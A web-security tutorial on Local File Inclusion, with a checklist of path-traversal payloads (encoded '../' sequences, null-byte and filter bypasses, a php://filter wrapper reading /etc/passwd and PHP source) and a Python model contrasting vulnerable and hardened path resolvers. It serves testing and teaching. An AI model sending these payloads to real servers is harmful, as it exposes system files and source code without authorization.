Path Traversal for Local File Inclusion (LFI)
Local File Inclusion (LFI) is an attack technique in which an attacker tricks a web application into running or exposing files on the web server. LFI is commonly achieved through path traversal, also known as directory traversal. Path traversal becomes possible when an application incorporates user-supplied data into a file path that it then uses to access the underlying filesystem.
Check file uploads (e.g. profile pictures), the location of imported scripts and images on the server, and URL parameters (e.g. ?lang=en). Any parameter can potentially be vulnerable to local file inclusion, but it is worth paying particular attention to the following parameter names: cat, dir, action, filename, board, date, detail, file, download, path, folder, prefix, include, page, inc, locate, show, doc, site, type, view, content, document, layout, mod, conf and directory. Note that some vulnerable requests may be made in an API call and not be directly reflected in the URL of the website. These are most of the steps I usually follow:
  1. Test adding "./": file=./image_id
  2. Run a wordlist. If it doesn't find anything proceed to manual exploration.
  3. Check for /etc/passwd using absolute paths: file=/etc/passwd
  4. Check for /etc/passwd using relative paths: file=../../../../../../../../../../etc/passwd
  5. Append an extension, such as /etc/passwd.jpg (use an extension already used by the files on the website)
  6. Test with: /etc/passwd%00
  7. Test /etc/passwd%00.jpg (the extension being used by the images on the website)
  8. Check for /etc/passwd using URL-encoded (percent-encoded) strings: file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
  9. Check whether a filter strips "../" in a single, non-recursive pass (the leftover characters recombine into "../"): file=..././..././..././..././etc/passwd
  10. Try double-encoding: file=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
  11. Keep the path to the images folder in the URL: filename=/var/www/images/../../../../../etc/passwd.
  12. If you can reach a PHP file but cannot see its contents, try a PHP wrapper such as:
    http://example.com/index.php?filename=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
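As an added illustration (not part of the original notes), the following Python model shows why the checks above behave as they do: a vulnerable path resolver, a single-pass "../" filter, and a hardened resolver that confines every resolved path to the images directory. IMAGES_DIR, evaluate() and the sample values are assumptions constructed for the demo; the web server is modelled as URL-decoding the query parameter exactly once.

```python
import os
from urllib.parse import unquote

# Assumed (constructed) base directory the application serves images from.
IMAGES_DIR = "/var/www/images"


def strip_traversal_once(user_file: str) -> str:
    """Flawed filter: removes '../' in a single pass. Step 9's '..././'
    collapses to '../' after one pass, so the traversal survives."""
    return user_file.replace("../", "")


def naive_path(user_file: str) -> str:
    """Vulnerable resolver: os.path.join discards IMAGES_DIR when the second
    argument is absolute, and nothing stops '..' from leaving the directory."""
    return os.path.normpath(os.path.join(IMAGES_DIR, user_file))


def safe_path(user_file: str):
    """Hardened resolver: returns the real path only if it stays inside
    IMAGES_DIR, otherwise None. The server already URL-decoded the parameter
    once; decoding it again here would reintroduce the double-encoding bypass."""
    if "\x00" in user_file or os.path.isabs(user_file):
        return None  # %00 truncation tricks and absolute paths such as /etc/passwd
    base = os.path.realpath(IMAGES_DIR)
    candidate = os.path.realpath(os.path.join(base, user_file))
    if os.path.commonpath([base, candidate]) != base:
        return None  # '..' segments climbed out of the images folder
    return candidate


def evaluate(raw_param: str) -> dict:
    """Model one request: the server percent-decodes the query once, then each
    resolver sees the decoded value. Returns what every resolver yields."""
    decoded = unquote(raw_param)
    return {
        "decoded": decoded,
        "naive": naive_path(decoded),
        "naive_after_filter": naive_path(strip_traversal_once(decoded)),
        "safe": safe_path(decoded),
    }


if __name__ == "__main__":
    # Constructed sample of the parameter values tested in the steps above.
    for raw in ["./image_id", "/etc/passwd", "../../../../../../etc/passwd",
                "/etc/passwd%00.jpg", "%2e%2e%2f%2e%2e%2fetc/passwd",
                "..././..././etc/passwd", "%252e%252e%252fetc/passwd"]:
        r = evaluate(raw)
        print(f"{raw!r}: safe={r['safe']}  naive={r['naive']}")
```

The double-encoded value ("%252e...") is accepted by safe_path because after a single decode it is just a literal file name inside the images folder; it only becomes a traversal if the application decodes a second time.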